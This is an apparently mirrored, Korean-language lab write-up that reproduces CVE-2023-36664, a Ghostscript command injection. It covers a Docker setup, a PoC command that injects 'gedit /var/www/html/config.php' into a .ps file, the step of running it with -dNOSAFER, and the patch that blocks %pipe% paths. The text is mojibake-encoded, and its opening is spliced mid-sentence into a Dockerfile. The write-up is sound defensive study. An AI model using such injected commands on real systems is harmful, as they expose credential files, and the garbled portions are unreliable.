Share
## https://sploitus.com/exploit?id=BAC67664-3433-5AD2-8F3E-35D5F2419967
# CVE-2023-36664: Ghostscript Remote Code Execution

## ์ทจ์•ฝ์  ์š”์•ฝ

**CVE ID:** CVE-2023-36664  
**์ œํ’ˆ:** Ghostscript ( /var/www/html/config.php

RUN useradd -m -s /bin/bash test

WORKDIR /home/test
USER test

CMD ["/bin/bash"]
```
#### ๊ธฐ๋ณธ apt install

๊ธฐ๋ณธ์ ์ธ poc ํ™˜๊ฒฝ์„ ๊ตฌ์„ฑํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” Ghostscript ์ทจ์•ฝ ๋ฒ„์ „์„ ๊ฐ€์ ธ์˜ค๊ธฐ ์œ„ํ•œ wget, tar.gz ์••์ถ•์„ ํ‘ผ ์ดํ›„ source๋ฅผ ์„ค์น˜ํ•˜๊ธฐ ์œ„ํ•œ build-essential, .ps ์‹คํ–‰์‹œ ์•…์˜์ ์œผ๋กœ ๋„์šธ ๋ฉ”๋ชจ์žฅ(gedit) ๋“ฑ์ด ์žˆ๋‹ค.

#### Ghostscript 10.01.1 ์„ค์น˜
 
![png3](png3.png)
![png4](png4.png)
Ghostscript ์ทจ์•ฝ ๋ฒ„์ „ 10.01.1์€ git์—์„œ source๋ฅผ ๊ฐ€์ ธ์™€์„œ ์„ค์น˜ํ•˜์˜€๋‹ค. `RUN ./configure && \ make && \ make install`๋Š” source ๋‹ค์šด๋ฐ›์€ ํด๋”์— ์‚ฌ์šฉ๋ฒ•์ด ์ ํ˜€์žˆ์–ด ๋”ฐ๋ผ์„œ ์„ค์น˜ํ•œ ๊ฒƒ์ด๋‹ค.

#### ํƒˆ์ทจํ•  ์ •๋ณด
๋ณดํ†ต /var/www/html/config.php์—๋Š” ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ํ•ต์‹ฌ ์„ค์ •๊ฐ’๋“ค์ด ๋“ค์–ด๊ฐ„๋‹ค. ์˜ˆ๋ฅผ ๋“ค๋ฉด ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„, ๋น„๋ฐ€๋ฒˆํ˜ธ
๊ทธ๋ž˜์„œ ์ž„์˜๋กœ DB ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํƒˆ์ทจํ•œ๋‹ค๊ณ  ์ƒ๊ฐํ•˜๊ณ  config.php ํŒŒ์ผ์„ ์ƒ์„ฑํ•œ๋‹ค.

#### ์ผ๋ฐ˜ ๊ณ„์ • ์ƒ์„ฑ
root ๊ณ„์ •์ด ์•„๋‹Œ ์ผ๋ฐ˜ ๊ณ„์ • test๋กœ poc๋ฅผ ํ•  ์˜ˆ์ •์ด๊ธฐ ๋•Œ๋ฌธ์— ์ƒˆ๋กœ์šด user๋ฅผ ์ƒ์„ฑํ•ด์ค€๋‹ค.

---

## ์žฌํ˜„ ์ ˆ์ฐจ

### 1. ํ™˜๊ฒฝ ๊ตฌ์ถ•

```bash
# Docker ์ด๋ฏธ์ง€ ๋นŒ๋“œ
docker compose -f docker-compose.yml up -d

# ์ปจํ…Œ์ด๋„ˆ ์‹คํ–‰
docker exec -it cve_lab bash
```

### 2. PoC ํŒŒ์ผ ์ƒ์„ฑ

์ปจํ…Œ์ด๋„ˆ ๋‚ด์—์„œ:
![png5](png5.png)

```bash
python3 poc.py -p "gedit /var/www/html/config.php" -m r -f test
```


**์ƒ์„ฑ ๊ฒฐ๊ณผ:**
![png6](png6.png)

์ž…๋ ฅํ–ˆ๋˜ ์•…์„ฑ ๊ฒฝ๋กœ๊ฐ€ .ps ์•ˆ์— ์ž˜ ๋“ค์–ด๊ฐ€ ์žˆ๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

### 3. Ghostscript๋กœ ์•…์˜์  ํŒŒ์ผ ์ฒ˜๋ฆฌ

```bash
gs -dNOSAFER test.ps
```
![png7](png7.png)
### 4. ๊ฒฐ๊ณผ ํ™•์ธ

gedit๊ฐ€ ์ž๋™์œผ๋กœ ์—ด๋ฆฌ๋ฉฐ `/var/www/html/config.php` ๋‚ด์šฉ์ด ๋…ธ์ถœ๋œ๋‹ค.

```
DB_PASSWORD=SuperSecret1234!!!
```

---


## ๋Œ€์‘ ๋ฐฉ์•ˆ

![png8](png8.png)


### 1. ๋ณด์•ˆ ํŒจ์น˜ ์ ์šฉ ๋ฐ ์—…๋ฐ์ดํŠธ
๊ณต์‹์ ์œผ๋กœ ์ทจ์•ฝ์ ์ด ์ˆ˜์ •๋œ Ghostscript 10.01.2 ์ด์ƒ ์ตœ์‹  ๋ฒ„์ „์œผ๋กœ ์—…๋ฐ์ดํŠธ๋ฅผ ์ˆ˜ํ–‰ํ•ด์•ผ ํ•œ๋‹ค.

### 2. ํŒจ์น˜ ์†Œ์Šค์ฝ”๋“œ ๋ถ„์„์„ ํ†ตํ•œ ๋ฐฉ์–ด ๋ฉ”์ปค๋‹ˆ์ฆ˜ ์ดํ•ด
๊ณต์‹ ํŒจ์น˜์—์„œ๋Š” `gp_validate_path_len()` ํ•จ์ˆ˜ ์•ˆ์—์„œ `gp_file_name_reduce()`๋ฅผ ํ˜ธ์ถœํ•˜๊ธฐ ์ „์— ๊ฒ€์ฆ์„ ํ•˜๋Š” ๋กœ์ง์ด ์ถ”๊ฐ€๋˜์—ˆ๋‹ค.

ํŒŒ์ดํ”„ ํŠน์ˆ˜ ๋ฌธ์ž์—ด ์˜ˆ์™ธ ์ฒ˜๋ฆฌ ๋ฐ ์ฐจ๋‹จ ๊ฐ•์ œ: ์ž…๋ ฅ ๊ฒฝ๋กœ์˜ ์ ‘๋‘์‚ฌ๊ฐ€ %pipe% ๋˜๋Š” | ๊ธฐํ˜ธ๋กœ ์‹œ์ž‘ํ•˜๋Š” ๊ฒฝ์šฐ๋ฅผ ๋ณ„๋„๋กœ ์™„๋ฒฝํ•˜๊ฒŒ ๊ฐ์ง€ํ•˜๋Š” ๋ถ„๊ธฐ๋ฌธ์ด ์ถ”๊ฐ€๋˜์—ˆ๋‹ค.


๊ณต์‹ ํŒจ์น˜ ๋ฒ„์ „: https://github.com/ArtifexSoftware/ghostpdl/commit/5f56c6f6f989816fc9cc671116740acecbed5b6c






## ์ฐธ๊ณ  ์ž๋ฃŒ

- **CVE ๊ณต์‹ ํŽ˜์ด์ง€:** https://vulners.com/cve/CVE-2023-36664
- **CVE ์ดํ•ด:** https://www.vicarius.io/vsociety/posts/cve-2023-36664-command-injection-with-ghostscript
- **PoC ์žฌํ˜„:** https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

---